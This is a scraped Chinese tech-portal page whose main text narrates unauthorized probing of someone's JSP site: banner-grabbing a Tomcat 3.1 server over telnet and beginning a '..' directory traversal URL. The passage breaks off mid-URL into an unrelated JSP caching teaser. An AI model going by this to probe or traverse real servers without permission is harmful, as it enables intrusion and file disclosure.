| 天极软件专题专区精选 到天极软件“读编交流区”畅所欲言 |
| Google专区 |
POPO专区 |
QQ专区 QQ挂机 |
了解Web2.0 |
| Flash MX 视频教程 |
Photoshop视频教程 |
网页设计视频教程 |
照片处理数字暗房 |
| PPT动画演示教程 |
Excel动画教程集 |
Word动画演示教程 |
Windows Vista专区 |
| 特洛伊木马专区 |
黑客知识教程专区 |
防火墙应用专区 |
注册表应用专区 |
| Windows API开发专区 |
网络编程专区 |
VB数据库编程专区 |
图像处理与多媒体编程 |
很偶然的一个机会,浏览到一个网站,页面清新让人感觉很舒服。网站是用JSP开发的,出于个人爱好,我决定测试一下其系统的安全性。
telnet www.target.com 8080
GET /CHINANSL HTTP/1.1
[Enter]
[Enter]
返回的结果如下:
HTTP/1.0 404 Not Found
Date: Sun, 08 Jul 2001 07:49:13 GMT
Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2
.2.12 i386; java.vendor=Blackdown Java-Linux Team)
Content-Language: en
Content-Type: text/html
Status: 404
<h1>Error: 404</h1>
<h2>Location: /CHINANSL</h2>File Not Found<br>/CHINANSL
获得了运行的WEBServer的名称“Tomcat 3.1”。记得曾经发现过这个版本的漏洞,并且post到bugtrap上去过。
回忆一下,大概是通过“..”技术可以退出WEB目录,于是:
http://target:8080/../../../../下一篇:JSP 2.0下的动态内容缓存分析讲解 在Web应用中,内容缓存是最普通的优化技术之一,并且能够很容易地实现。例如,可以使用一个自定义地JSP标签——我们将之命名为<jc:cache>——由<jc:cache>和</jc:cache>将每一个需要被缓存的页面片段封装起来。任何自定义标签可以控制它所包含部分 (也即预先封装的页面片段)在何时执行,并且动态输出结果可以被捕获。<jc:cache>标签使得JSP容器(例如Tomcat)只生成内容一次,作为应用程序范围内的JSP变量,来存储每一个缓存片段。每次JSP页面被执行时,自定义标签将缓存页面片段载入而无需再次执行JSP代码来生成输出结果。作...[查看详情] | 
